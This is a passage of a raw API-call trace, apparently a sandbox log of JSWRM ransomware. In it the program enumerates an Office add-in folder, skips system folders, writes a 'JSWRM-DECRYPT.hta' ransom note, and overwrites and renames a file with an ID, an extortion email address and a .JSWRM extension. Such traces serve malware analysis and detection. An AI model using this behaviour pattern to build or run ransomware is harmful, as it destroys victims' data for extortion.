lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0126.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1ef7e0 [0126.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0126.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.381] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4646280, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4646280, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4646280, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e70, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 0 [0126.381] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0126.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ef7e0 | out: hHeap=0x1e0000) returned 1 [0126.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0126.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0126.381] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff580e7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="el", cAlternateFileName="")) returned 1 [0126.381] lstrcmpiW (lpString1="el", lpString2=".") returned 1 [0126.381] lstrcmpiW (lpString1="el", lpString2="..") returned 1 [0126.381] lstrcmpiW (lpString1="el", lpString2="...") returned 1 [0126.381] lstrcmpiW (lpString1="el", lpString2="windows") returned -1 [0126.381] lstrcmpiW (lpString1="el", lpString2="recovery") returned -1 [0126.381] lstrcmpiW (lpString1="el", lpString2="perflogs") returned -1 [0126.381] lstrcmpiW (lpString1="el", lpString2="documents and settings") returned 1 [0126.381] lstrcmpiW (lpString1="el", lpString2="$RECYCLE.BIN") returned 1 [0126.381] lstrcmpiW (lpString1="el", lpString2="system volume information") returned -1 [0126.381] lstrcmpiW (lpString1="el", lpString2="msocache") returned -1 [0126.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0126.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0126.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0126.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0126.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0126.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0126.381] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\el\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\el\\jswrm-decrypt.hta")) returned 0xffffffff [0126.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0126.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0126.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x278330 [0126.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0126.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27a100 [0126.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0126.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0126.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0126.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\el\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\el\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.384] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.384] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.385] CloseHandle (hObject=0x314) returned 1 [0126.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0126.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27a100 | out: hHeap=0x1e0000) returned 1 [0126.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0126.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0126.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0126.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0126.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0126.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0126.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0126.385] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\el\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\el\\jswrm-decrypt.hta")) returned 0x20 [0126.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0126.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0126.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0126.386] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\el\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff580e7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41fd7a46, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0126.386] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.386] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff580e7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41fd7a46, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="..", cAlternateFileName="")) returned 1 [0126.386] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.386] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.386] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41fd7a46, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x41fd7a46, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x41fd7a46, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.386] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.386] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.386] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.386] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.386] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.386] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.386] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.386] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.386] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.386] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0126.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0126.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0126.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0126.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0126.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0126.387] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x167a9331, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x169d, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0126.387] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2=".") returned 1 [0126.387] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="..") returned 1 [0126.387] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="...") returned 1 [0126.387] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="windows") returned -1 [0126.387] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="recovery") returned -1 [0126.387] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="perflogs") returned -1 [0126.387] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="documents and settings") returned 1 [0126.387] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="$RECYCLE.BIN") returned 1 [0126.387] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="system volume information") returned -1 [0126.387] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="msocache") returned -1 [0126.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0126.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x240f48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0126.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x240fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0126.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0126.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0126.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\el\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\el\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.389] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=5789) returned 1 [0126.389] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1690) returned 0x278330 [0126.389] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x1690, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x1690, lpOverlapped=0x0) returned 1 [0126.392] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.392] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1690, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x1690, lpOverlapped=0x0) returned 1 [0126.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.392] CloseHandle (hObject=0x338) returned 1 [0126.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0126.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0126.392] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\el\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\el\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\el\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\el\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.396] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf073ddf4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf073ddf4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf073ddf4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xcaa8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0126.396] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2=".") returned 1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="..") returned 1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="...") returned 1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="windows") returned -1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="recovery") returned -1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="perflogs") returned -1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="system volume information") returned -1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="msocache") returned -1 [0126.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22ce70, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.397] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa68949f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa68949f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa806c3d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x38aa8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cAlternateFileName="MIDF86~1.DLL")) returned 1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2=".") returned 1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="..") returned 1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="...") returned 1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="windows") returned -1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="recovery") returned -1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="perflogs") returned -1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="documents and settings") returned 1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="system volume information") returned -1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="msocache") returned -1 [0126.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dba8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 